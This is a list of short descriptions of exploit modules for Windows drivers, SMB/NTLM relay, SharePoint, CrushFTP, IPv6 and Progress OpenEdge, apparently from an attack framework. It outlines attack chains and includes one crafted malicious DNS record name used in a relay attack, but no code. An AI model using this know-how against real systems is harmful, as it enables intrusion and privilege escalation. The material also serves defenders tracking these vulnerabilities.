The vulnerability exists within the GetCookie() endpoint due to unsafe deserialization of AuthorizationCookie objects. The application insecurely decrypts cookie data using AES-128-CBC and subsequently deserialize it via BinaryFormatter without sufficient type validation.
This module exploits an access control issue in Windows SMB clients to deploy a remote agent with SYSTEM privileges through a multi-stage attack chain: 1. DNS Injection: Adds a malicious DNS record 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' via LDAP to the domain controller, pointing to the attacker's IP address 2. NTLM Relay: Starts an ntlmrelayx server that waits for SMB authentication attempts and relays them to install an agent with SYSTEM privileges on the target system. 3. RPC Coercion: Forces the victim system to authenticate to the attacker-controlled DNS name using coercion techniques.
The Cloud Files Mini Filter Driver (cldflt.sys) present in Microsoft Windows is vulnerable to a Time-of-check Time-of-use (TOCTOU) Race Condition, which can result in arbitrary file write. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges.
An elevation of privilege vulnerability exists due to the Agere Windows Modem kernel module allowing untrusted pointer dereference. The vulnerability could allow an attacker to run code with elevated privileges.
The Common Log File System Driver (clfs.sys) present in Microsoft Windows is vulnerable to a memory corruption vulnerability. This module allows a local unprivileged user to execute arbitrary code with SYSTEM privileges.
Improper control of generation of code ('code injection') in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.
An elevation of privilege vulnerability exists due to the Application Identity kernel module allowing untrusted pointer dereference. The vulnerability could allow an attacker to run code with elevated privileges.
CrushFTP, when the DMZ proxy feature is not used, mishandles AS2 validation and consequently allows remote attackers to obtain admin access via HTTPS, as exploited in the wild in July 2025.
A memory corruption vulnerability in the Windows IPv6 stack allows remote Denial of Service via maliciously crafted IPv6 Fragment Header packets, leading to kernel-level compromise. Exploitation requires no authentication or user interaction-attackers need only send specially designed packets to vulnerable hosts. Impacts all Windows versions with IPv6 enabled (default since Windows 10).
CVE-2025-7388 is an OS command injection vulnerability in Progress OpenEdge that allows authenticated remote attackers to execute system commands in the context of NT AUTHORITY/SYSTEM. This module can also use CVE-2024-1403, an authentication bypass vulnerability that allow access to the adminServer classes so can chain it with CVE-2025-7388 OS command injection.